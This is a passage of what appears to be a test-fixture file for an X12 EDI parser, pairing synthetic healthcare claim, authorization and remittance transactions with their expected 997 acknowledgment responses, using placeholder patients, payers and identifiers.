SBR*S*18*******11~
NM1*IL*1*ARNOLD*TOM****MI*666333444~
N3*5324 ELM~
N4*STURGIS*MI*49091~
DMG*D8*19270312*M~
REF*SY*666333444~
NM1*PR*2*PAYER 2*****PI*000111~
N3*PO BOX 0000~
N4*KALAMAZOO*MI*48001~
CLM*12522228*0***11:A:7*Y*A*Y*A*********N~
DTP*434*RD8*20031213-20031218~
DTP*435*DT*200312130800~
CL1*9*9*09~
REF*F8*12522228~
HI*BK:29689*BJ:29689~
NM1*71*1*EXTERNAL*PROVIDER*C***34*999999999~
PRV*AT*ZZ*101Y00000X~
REF*0B*9999999~
NM1*FA*2*PROVIDER 1~
PRV*RP*ZZ*101Y00000X~
N3*PROVIDER 1~
N4*THREE RIVERS*MI*49093~
SBR*T*18**PAYER A*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PAYER A*****PI*552312313~
DTP*573*D8*20040210~
REF*F8*1253278~
SBR*P*18**PROVIDER 1*****11~
AMT*B6*605.0000~
AMT*C4*0~
DMG*D8*19570312*M~
OI***Y***I~
NM1*IL*1*ARNOLD*TOM****MI*00000007018~
N3*5324 ELM~
N4*STURGIS*MI*49091~
NM1*PR*2*PROVIDER 1*****PI*13256235~
REF*F8*1253278~
LX*1~
SV2*0100**0*UN*5*0*0~
DTP*472*RD8*20031213-20031218~
SVD*5222312313*0**0100*5~
DTP*573*D8*20040210~
SVD*13256235*0**0100*5~
DTP*573*D8*20040210~
SE*63*300145997~
GE*1*1~
IEA*1*000484889~"""
},
'fail_no_IEA':
{
'res997': """ISA*00* *00* *ZZ*ZZ001 *ZZ*ZZ000 *040701*1621*U*00401*407011621*0*T*:~
GS*FA*ZZ001*ZZ000*20040701*162104*17*X*004010~
ST*997*0001~
AK1*HC*17~
AK2*837*11280001~
AK3*BHT*1**3~
AK3*HL*1**3~
AK5*R*4*5~
AK9*R*1*1*0~
SE*8*0001~
GE*1*17~
TA1*000010121*030828*1128*R*023~
IEA*1*407011621~""",
'source': """ISA*00* *00* *ZZ*ZZ000 *ZZ*ZZ001 *030828*1128*U*00401*000010121*1*T*:~
GS*HC*ZZ000*ZZ001*20030828*1128*17*X*004010X098A1~
ST*837*11280001~
SE*0*11280001~
GE*1*17~"""
},
'loop_counting': {
'res997': """ISA*00* *00* *ZZ*BBBBBBBBB *ZZ*AAAAAAAA *041210*0057*U*00401*412100057*1*P*:~
GS*FA*BBBBBBBBB*AAAA*20041210*005722*1167*X*004010~
ST*997*0001~
AK1*HC*1167~
AK2*837*1179~
AK3*LX*385**4~
AK3*LX*392**4~
AK3*LX*399**4~
AK3*LX*406**4~
AK5*R*5~
AK9*R*1*1*0~
SE*10*0001~
GE*1*1167~
TA1*000001168*041105*1526*A*000~
IEA*1*412100057~""",
'source': """ISA*00* *00* *ZZ*AAAAAAAA *ZZ*BBBBBBBBB *041105*1526*U*00401*000001168*1*P*:~
GS*HC*AAAA*BBBBBBBBB*20041105*1526*1167*X*004010X098A1~
ST*837*1179~
BHT*0019*00*AAAA1179*20041105*1526*RP~
REF*87*004010X098A1~
NM1*41*2*Sender 1*****46*99999~
PER*IC*SUPPORT*EM*Support@dev.null*TE*8005553333~
NM1*40*2*Receiver 1*****46*8888888~
HL*1**20*1~
NM1*85*2*Sender 1*****24*999999999~
N3*399 ELM ROAD~
N4*Kalamazoo*MI*49001~
REF*1D*333402169~
HL*2*1*22*0~
SBR*P*18*******MC~
NM1*IL*1*THE FIFTH*RICHARD****MI*1212121~
N3*156 ELM~
N4*KALAMAZOO*MI*49001~
DMG*D8*19051104*M~
NM1*PR*2*PAYER 1*****PI*8888888~
CLM*3215338*21***12::1*Y*A*Y*A*B~
CN1*05~
HI*BK:317~
NM1*82*2*PROVIDER 1*****24*222185735~
PRV*PE*ZZ*103T00000X~
SBR*P*18***MC****MC~
AMT*B6*0~
DMG*D8*19051104*M~
OI***Y*B**I~
NM1*IL*1*THE FIFTH*RICHARD****MI*0000000004~
N3*156 ELM~
N4*KALAMAZOO*MI*49001~
REF*SY*777777777~
NM1*PR*2*Sender 1S*****PI*12128909~
REF*F8*3215338~
REF*G1*121282~
LX*1~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040407~
REF*6R*1057296~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*2~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040414~
REF*6R*1057297~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*3~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040421~
REF*6R*1057298~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*4~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*5~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*6~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*7~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*8~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*9~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*10~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*11~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*12~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*13~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*14~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*15~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*16~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*17~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*18~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*19~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*20~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*21~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*22~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*23~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*24~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*25~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*26~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*27~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*28~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*29~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*30~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*31~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*32~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*33~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*34~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*35~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*36~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*37~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*38~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*39~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*40~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*41~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*42~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*43~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*44~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*45~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*46~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*47~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*48~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*49~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*50~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*51~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*52~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*53~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*54~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
SE*413*1179~
GE*1*1167~
IEA*1*000001168~"""
},
'loop_counting2':
{
'res997': """ISA*00* *00* *ZZ*BBBBBBBBB *ZZ*AAAAAAAA *120718*1046*U*00401*207181046*1*P*:~
GS*FA*BBBBBBBBB*AAAA*20120718*104632*1167*X*004010~
ST*997*0001~
AK1*HC*1167~
AK2*837*1179~
AK3*LX*385**4~
AK3*LX*392**4~
AK3*LX*399**4~
AK3*LX*406**4~
AK5*R*5~
AK9*R*1*1*0~
SE*10*0001~
GE*1*1167~
TA1*000001168*041105*1526*A*000~
IEA*1*207181046~""",
'source': """ISA*00* *00* *ZZ*AAAAAAAA *ZZ*BBBBBBBBB *041105*1526*U*00401*000001168*1*P*:~
GS*HC*AAAA*BBBBBBBBB*20041105*1526*1167*X*004010X098A1~
ST*837*1179~
BHT*0019*00*AAAA1179*20041105*1526*RP~
REF*87*004010X098A1~
NM1*41*2*Sender 1*****46*99999~
PER*IC*SUPPORT*EM*Support@dev.null*TE*8005553333~
NM1*40*2*Receiver 1*****46*8888888~
HL*1**20*1~
NM1*85*2*Sender 1*****24*999999999~
N3*399 ELM ROAD~
N4*Kalamazoo*MI*49001~
REF*1D*333402169~
HL*2*1*22*0~
SBR*P*18*******MC~
NM1*IL*1*THE FIFTH*RICHARD****MI*1212121~
N3*156 ELM~
N4*KALAMAZOO*MI*49001~
DMG*D8*19051104*M~
NM1*PR*2*PAYER 1*****PI*8888888~
CLM*3215338*21***12::1*Y*A*Y*A*B~
CN1*05~
HI*BK:317~
NM1*82*2*PROVIDER 1*****24*222185735~
PRV*PE*ZZ*103T00000X~
SBR*P*18***MC****MC~
AMT*B6*0~
DMG*D8*19051104*M~
OI***Y*B**I~
NM1*IL*1*THE FIFTH*RICHARD****MI*0000000004~
N3*156 ELM~
N4*KALAMAZOO*MI*49001~
REF*SY*777777777~
NM1*PR*2*Sender 1S*****PI*12128909~
REF*F8*3215338~
REF*G1*121282~
LX*1~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040407~
REF*6R*1057296~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*2~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040414~
REF*6R*1057297~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*3~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040421~
REF*6R*1057298~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*4~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*5~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*6~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*7~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*8~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*9~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*10~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*11~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*12~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*13~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*14~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*15~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*16~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*17~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*18~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*19~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*20~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*21~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*22~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*23~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*24~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*25~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*26~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*27~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*28~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*29~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*30~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*31~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*32~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*33~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*34~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*35~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*36~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*37~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*38~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*39~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*40~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*41~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*42~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*43~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*44~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*45~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*46~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*47~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*48~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*49~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*50~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*51~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*52~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*53~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
LX*54~
SV1*HC:H2015:TT*21*UN*12***1~
DTP*472*D8*20040428~
REF*6R*1057299~
AMT*AAE*21~
SVD*174456543*21*HC:H2015:TT**12~
DTP*573*D8*20040929~
SE*413*1179~
GE*1*1167~
IEA*1*000001168~"""
},
'multiple_trn': {
'res997': """ISA*00* *00* *ZZ*ZZ001 *ZZ*ZZ000 *050807*0207*U*00401*508070207*0*T*:~
GS*FA*00GR*D00111*20050807*020749*383880001*X*004010~
ST*997*0001~
AK1*HI*17~
AK2*278*11280001~
AK3*HL*2**3~
AK5*R*5~
AK2*278*11280002~
AK3*HL*2**3~
AK5*R*5~
AK2*278*11280003~
AK3*HL*2**3~
AK5*R*5~
AK9*R*3*3*0~
SE*13*0001~
ST*997*0002~
AK1*HC*18~
AK2*837*11280001~
AK3*REF*2**3~
AK3*NM1*2**3~
AK3*NM1*2**3~
AK3*HL*2**3~
AK5*R*5~
AK9*R*1*1*0~
SE*10*0002~
ST*997*0003~
AK1*HP*383880001~
AK2*835*0001~
AK3*BPR*1**3~
AK5*R*5~
AK9*R*1*1*0~
SE*7*0003~
GE*3*383880001~
IEA*1*508070207~""",
'source': """ISA*00* *00* *ZZ*ZZ000 *ZZ*ZZ001 *030828*1128*U*00401*000010121*0*T*:~
GS*HI*ZZ000*ZZ001*20030828*1128*17*X*004010X094A1~
ST*278*11280001~
BHT*0078*11*121231*20050802*1202~
SE*3*11280001~
ST*278*11280002~
BHT*0078*13*121231*20050802*1202~
SE*3*11280002~
ST*278*11280003~
BHT*0078*11*121231*20050802*1202~
SE*3*11280003~
GE*3*17~
